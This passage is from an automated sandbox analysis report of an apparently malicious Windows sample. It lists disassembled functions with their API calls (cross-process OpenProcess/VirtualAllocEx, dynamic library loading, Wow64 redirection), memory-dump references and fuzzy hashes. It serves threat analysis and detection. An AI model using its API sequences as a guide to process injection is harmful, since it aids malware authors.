                                        • Part of subcall function 0097422F: GetWindowThreadProcessId.USER32(?,?), ref: 0097425A
                                        • Part of subcall function 0097422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0096BBCC,00000034,?,?,00001004,00000000,00000000), ref: 0097426A
                                        • Part of subcall function 0097422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0096BBCC,00000034,?,?,00001004,00000000,00000000), ref: 00974280
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0096C240
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0096C28D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 347be9cc4c668a10bcf4d1c12c8e13a28136488ed879417975de1190d9f4a643
                                      • Instruction ID: 09a335508da304c3a000d137ca8db5787f7f3af9b44ad9c7f0b692d817298f38
                                      • Opcode Fuzzy Hash: 347be9cc4c668a10bcf4d1c12c8e13a28136488ed879417975de1190d9f4a643
                                      • Instruction Fuzzy Hash: 71414B72900218AFDB10DFA4CD91BEEB7B8BF49700F008095FA99B7181DB71AE45CB61
                                      Function 0099A63F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,009CDC00,00000000,?,?,?,?), ref: 0099A6D8
                                      • GetWindowLongW.USER32 ref: 0099A6F5
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0099A705
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: b3e310e9838b270fdcf781661c8328c431f2a93adc93ed3789867f5986864360
                                      • Instruction ID: 9f435ef490c0829784c43b07d50131a194850b59f15cd4a6fe0d4e9f9fc7ff2b
                                      • Opcode Fuzzy Hash: b3e310e9838b270fdcf781661c8328c431f2a93adc93ed3789867f5986864360
                                      • Instruction Fuzzy Hash: 4031AE3160520AAFDF118E78CC45BEA77A9EB49334F254729F975932E0D730A8509B91
                                      Function 0099A0D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0099A15E
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0099A172
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0099A196
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window
                                      • String ID: SysMonthCal32
                                      • API String ID: 2326795674-1439706946
                                      • Opcode ID: 37ff9ad26cce28695c2c03cbb97fdf4b5e315328de49b88502790ce92e26722f
                                      • Instruction ID: 0e464f61882ae6265211168f16dd916ebc5fe45c11ba371eee2127fc565577b8
                                      • Opcode Fuzzy Hash: 37ff9ad26cce28695c2c03cbb97fdf4b5e315328de49b88502790ce92e26722f
                                      • Instruction Fuzzy Hash: 0121A132514218ABDF258F98CC42FEA3B7AEF88724F110214FE55AB1D0D6B5AC51DB90
                                      Function 0099A88A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0099A941
                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0099A94F
                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0099A956
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 4014797782-2298589950
                                      • Opcode ID: 069b73aea0c7db508a3722a0606a2f7b16dd5acb6bd88ef05f6f9ad02c8fa457
                                      • Instruction ID: a764e608b493c79ae3fc3d06ab344d76aab07b04cbc3a2de82012c73ec32909e
                                      • Opcode Fuzzy Hash: 069b73aea0c7db508a3722a0606a2f7b16dd5acb6bd88ef05f6f9ad02c8fa457
                                      • Instruction Fuzzy Hash: F721A1B5600209AFDB10DF29CC91E7737ADEF9A3A8B050159FA049B261CB30EC11DBA1
                                      Function 009999A5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00999A30
                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00999A40
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00999A65
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$MoveWindow
                                      • String ID: Listbox
                                      • API String ID: 3315199576-2633736733
                                      • Opcode ID: 0b84ca1b9ea06f45606cfecc04ea649b84e4b675be0e69269954785133853632
                                      • Instruction ID: ad7c91a471d8bca830b3ec0dde3fdd8c163cefeea595ee10704539e3578bb74a
                                      • Opcode Fuzzy Hash: 0b84ca1b9ea06f45606cfecc04ea649b84e4b675be0e69269954785133853632
                                      • Instruction Fuzzy Hash: 4D21BE32611118BFDF268F5CCC85FBF3BAEEB89764F018128F9549B1A0C6719C5297A0
                                      Function 0099A409 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0099A46D
                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0099A482
                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0099A48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: msctls_trackbar32
                                      • API String ID: 3850602802-1010561917
                                      • Opcode ID: 9d0eee63712a2fc677221c2d30edeb102220d51206362200019566aa18841fea
                                      • Instruction ID: 3e09d96ed47618c120acb515d5c88941f46b7b9c96486e9414f8a2b38082dce5
                                      • Opcode Fuzzy Hash: 9d0eee63712a2fc677221c2d30edeb102220d51206362200019566aa18841fea
                                      • Instruction Fuzzy Hash: 27110A71210208BEEF245F69CC45FAB376DEFC8754F014118FA45960E1D2B2E811D760
                                      Function 00952287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 009522A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 009522A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoInitialize$combase.dll
                                      • API String ID: 2574300362-340411864
                                      • Opcode ID: eafb655ee2f14bcef2536fe0bda3db6ed2aa9e2f099e419ce5529ee44d465fe7
                                      • Instruction ID: e9fb7ad7a4799f608c0a2f3a7c15d8c7d306b6f5decebdf0eb16f72c7d589896
                                      • Opcode Fuzzy Hash: eafb655ee2f14bcef2536fe0bda3db6ed2aa9e2f099e419ce5529ee44d465fe7
                                      • Instruction Fuzzy Hash: AAE01A746BD301ABDB105F71ED8DB64366DA781726F504420F112E60B0EBB55444EF08
                                      Function 0095235C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00952276), ref: 00952376
                                      • GetProcAddress.KERNEL32(00000000), ref: 0095237D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RoUninitialize$combase.dll
                                      • API String ID: 2574300362-2819208100
                                      • Opcode ID: 28ab5c4d8fe2f462eb468774d1b99e1a17b8b7f20d368b266edf4490a3edcdf0
                                      • Instruction ID: 666cff6f47f450b8ddbe17c441404fe9b63987217267e7f4adef281d604dbe0d
                                      • Opcode Fuzzy Hash: 28ab5c4d8fe2f462eb468774d1b99e1a17b8b7f20d368b266edf4490a3edcdf0
                                      • Instruction Fuzzy Hash: C9E0B67466E300EBDB209F61EE4DB243A6DB783B16F210424F509E60B1DBB95814EB14
                                      Function 009AAC59 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LocalTime__swprintf
                                      • String ID: %.3d$WIN_XPe
                                      • API String ID: 2070861257-2409531811
                                      • Opcode ID: 9e5f92528f77e64e1fe5fcb4259b1f9c30195856168685755cb72e71fa250b4e
                                      • Instruction ID: a975ec5690ccb82a00509783d3956d237688b3d66c996eec8469ab05deb85c24
                                      • Opcode Fuzzy Hash: 9e5f92528f77e64e1fe5fcb4259b1f9c30195856168685755cb72e71fa250b4e
                                      • Instruction Fuzzy Hash: E5E01271805658DBDB11DB51CD45EF973BCA709761F100892B946E1104E73D9B84EF52
                                      Function 0094E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,0094E014,76230AE0,0094DEF1,009CDC38,?,?), ref: 0094E02C
                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0094E03E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                      • API String ID: 2574300362-192647395
                                      • Opcode ID: d2016fde64aa3b3eecf6473e1f5a7bad7227c7ce636e658b9979f31eeb93b8ad
                                      • Instruction ID: 367cf2cdcf98b3b7e388ba8208a904c39f7040aa954cf01bd70115e3a1d3d8db
                                      • Opcode Fuzzy Hash: d2016fde64aa3b3eecf6473e1f5a7bad7227c7ce636e658b9979f31eeb93b8ad
                                      • Instruction Fuzzy Hash: 30D0A73041C722DFC7364F65ED08A2277DCBF04314F18442DE491D2150EBF4CC808650
                                      Function 009342F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000000,009342EC,?,009342AA,?), ref: 00934304
                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934316
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-1355242751
                                      • Opcode ID: 843ccc0af177890c54eae16a68edd752139eb688ad7ecd1969e4ad7bf0db0525
                                      • Instruction ID: f6176b796882cb657a31eb205fafbb2ca01c50bf8448f1e70f1505eb41b4aaef
                                      • Opcode Fuzzy Hash: 843ccc0af177890c54eae16a68edd752139eb688ad7ecd1969e4ad7bf0db0525
                                      • Instruction Fuzzy Hash: 9CD0A730418712DFC7255F66ED0C60176DCAB08315F01842DE441D3165EBB4DC808A10
                                      Function 00992205 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,009921FB,?,009923EF), ref: 00992213
                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00992225
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetProcessId$kernel32.dll
                                      • API String ID: 2574300362-399901964
                                      • Opcode ID: fbe7e6f2516335bad0c2f1b37369e0515c1d9c418c74d4afd478dfd5c7b95957
                                      • Instruction ID: 3e6eef39dc01cf99e2f061068ef03d7723fcde1d37785f6553be099816d43b94
                                      • Opcode Fuzzy Hash: fbe7e6f2516335bad0c2f1b37369e0515c1d9c418c74d4afd478dfd5c7b95957
                                      • Instruction Fuzzy Hash: 28D0A734418712AFCB2E4F3AFD0860576DCEB08314B00442DE851E2250EB70DC809650
                                      Function 0093434B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(kernel32.dll,009341BB,00934341,?,0093422F,?,009341BB,?,?,?,?,009339FE,?,00000001), ref: 00934359
                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0093436B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                      • API String ID: 2574300362-3689287502
                                      • Opcode ID: cdfd4ac527edf58a4306e88b7c16a2b5fc2da2b28bdf957d1d0588a3825f170b
                                      • Instruction ID: 46c235b80fe652081d54bf9d4fd3e137c6639320bbe061f193f1b1242cade032
                                      • Opcode Fuzzy Hash: cdfd4ac527edf58a4306e88b7c16a2b5fc2da2b28bdf957d1d0588a3825f170b
                                      • Instruction Fuzzy Hash: EAD0A730418712DFC7254F35ED0C6017ADCAB14729F01852DE4C1D3150FBB4EC808A10
                                      Function 00970539 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,0097051D,?,009705FE), ref: 00970547
                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00970559
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                      • API String ID: 2574300362-1071820185
                                      • Opcode ID: 9cfac22372ff422a811715340338d6e8378f624a4045b0c8925c0a925e094a1f
                                      • Instruction ID: 6b0079fa895430598a036bade80a9c11ac338c12b11ee345ee07aa80b3dec01e
                                      • Opcode Fuzzy Hash: 9cfac22372ff422a811715340338d6e8378f624a4045b0c8925c0a925e094a1f
                                      • Instruction Fuzzy Hash: 36D0A73141C712DFC7208F66EC0860176FCAB40715B10C82DF48AD2190E6B0CC808A10
                                      Function 00970564 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0097052F,?,009706D7), ref: 00970572
                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00970584
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
